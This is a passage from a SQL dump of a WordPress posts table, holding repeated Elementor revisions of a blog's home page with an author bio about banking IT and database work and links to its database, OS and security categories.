src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-04-17 18:59:55','2023-04-17 18:59:55','',647,'https://ictbank.ir/blog/?p=657',0,'revision','',0),
(659,2,'2023-04-19 06:45:02','2023-04-19 06:45:02','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-04-19 06:45:02','2023-04-19 06:45:02','',647,'https://ictbank.ir/blog/?p=659',0,'revision','',0),
(660,2,'2023-04-19 06:45:02','2023-04-19 06:45:02','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-04-19 06:45:02','2023-04-19 06:45:02','',647,'https://ictbank.ir/blog/?p=660',0,'revision','',0),
(661,2,'2023-04-19 06:45:03','2023-04-19 06:45:03','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-04-19 06:45:03','2023-04-19 06:45:03','',647,'https://ictbank.ir/blog/?p=661',0,'revision','',0),
(663,2,'2023-04-19 06:47:26','2023-04-19 06:47:26','','Elementor-post-screenshot_358_2023-04-19-06-47-26_76a29a2e.png','','inherit','open','closed','','elementor-post-screenshot_358_2023-04-19-06-47-26_76a29a2e-png','','','2023-04-19 06:47:26','2023-04-19 06:47:26','',358,'http://ictbank.ir/blog/wp-content/uploads/elementor/screenshots/Elementor-post-screenshot_358_2023-04-19-06-47-26_76a29a2e.png',0,'attachment','image/png',0),
(665,2,'2023-04-19 06:47:36','2023-04-19 06:47:36','','Elementor-post-screenshot_386_2023-04-19-06-47-36_7d0c48b2.png','','inherit','open','closed','','elementor-post-screenshot_386_2023-04-19-06-47-36_7d0c48b2-png','','','2023-04-19 06:47:36','2023-04-19 06:47:36','',386,'http://ictbank.ir/blog/wp-content/uploads/elementor/screenshots/Elementor-post-screenshot_386_2023-04-19-06-47-36_7d0c48b2.png',0,'attachment','image/png',0),
(666,2,'2023-04-19 06:47:44','2023-04-19 06:47:44','','Elementor-post-screenshot_387_2023-04-19-06-47-44_f93a5e6.png','','inherit','open','closed','','elementor-post-screenshot_387_2023-04-19-06-47-44_f93a5e6-png','','','2023-04-19 06:47:44','2023-04-19 06:47:44','',387,'http://ictbank.ir/blog/wp-content/uploads/elementor/screenshots/Elementor-post-screenshot_387_2023-04-19-06-47-44_f93a5e6.png',0,'attachment','image/png',0),
(667,2,'2023-04-19 06:52:35','2023-04-19 06:52:35','','Default Kit','','inherit','closed','closed','','345-revision-v1','','','2023-04-19 06:52:35','2023-04-19 06:52:35','',345,'https://ictbank.ir/blog/?p=667',0,'revision','',0),
(670,2,'2023-05-01 15:31:04','2023-05-01 15:31:04','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-05-01 15:31:04','2023-05-01 15:31:04','',647,'https://ictbank.ir/blog/?p=670',0,'revision','',0),
(671,2,'2023-05-01 15:31:04','2023-05-01 15:31:04','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-05-01 15:31:04','2023-05-01 15:31:04','',647,'https://ictbank.ir/blog/?p=671',0,'revision','',0),
(672,2,'2023-05-01 15:31:05','2023-05-01 15:31:05','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-05-01 15:31:05','2023-05-01 15:31:05','',647,'https://ictbank.ir/blog/?p=672',0,'revision','',0),
(675,2,'2023-05-01 15:34:24','2023-05-01 15:34:24','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-05-01 15:34:24','2023-05-01 15:34:24','',647,'https://ictbank.ir/blog/?p=675',0,'revision','',0),
(676,2,'2023-05-01 15:34:24','2023-05-01 15:34:24','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-05-01 15:34:24','2023-05-01 15:34:24','',647,'https://ictbank.ir/blog/?p=676',0,'revision','',0),
(677,2,'2023-05-01 15:34:24','2023-05-01 15:34:24','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-05-01 15:34:24','2023-05-01 15:34:24','',647,'https://ictbank.ir/blog/?p=677',0,'revision','',0),
(678,2,'2023-05-01 15:35:07','2023-05-01 15:35:07','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-05-01 15:35:07','2023-05-01 15:35:07','',647,'https://ictbank.ir/blog/?p=678',0,'revision','',0),
(679,2,'2023-05-01 15:35:07','2023-05-01 15:35:07','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a passion for helping organizations optimize their data and IT operations, and am committed to providing high-quality solutions that meet their unique needs.</p> \n <a href=\"http://ictbank.ir/blog/category/database/\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Databases01-e1621614447218.jpg\" alt=\"Database RDBMS Oracle SQL MySQL MariaDB PostgreSQL MongoDB\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/os\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_OS01-e1621627479921.jpg\" alt=\"Operation System\" loading=\"lazy\" /> </a>\n <a href=\"http://ictbank.ir/blog/category/security\">\n <img width=\"150\" height=\"200\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/Buttons_Security01-e1621661226935.jpg\" alt=\"Security\" loading=\"lazy\" /> </a>','Home Page','','inherit','closed','closed','','647-revision-v1','','','2023-05-01 15:35:07','2023-05-01 15:35:07','',647,'https://ictbank.ir/blog/?p=679',0,'revision','',0),
(680,2,'2023-05-01 15:35:07','2023-05-01 15:35:07','<style>/*! elementor - v3.12.1 - 02-04-2023 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style> <img width=\"640\" height=\"640\" src=\"http://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51.jpg 640w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-300x300.jpg 300w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-150x150.jpg 150w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-600x600.jpg 600w, https://ictbank.ir/blog/wp-content/uploads/2021/05/1400-02-02-12.02.51-100x100.jpg 100w\" sizes=\"(max-width: 640px) 100vw, 640px\" /> \n <p>With 11 years of experience in the IT industry, primarily in the banking sector, I bring a wealth of knowledge and expertise in IT management. My experience as a database administrator and data warehouse designer has given me a deep understanding of how to effectively organize, store, and utilize data. In addition, my background as a knowledgeable IT manager has equipped me with the skills needed to lead and motivate teams to achieve their goals. As an IT consultant and advisor, I have a 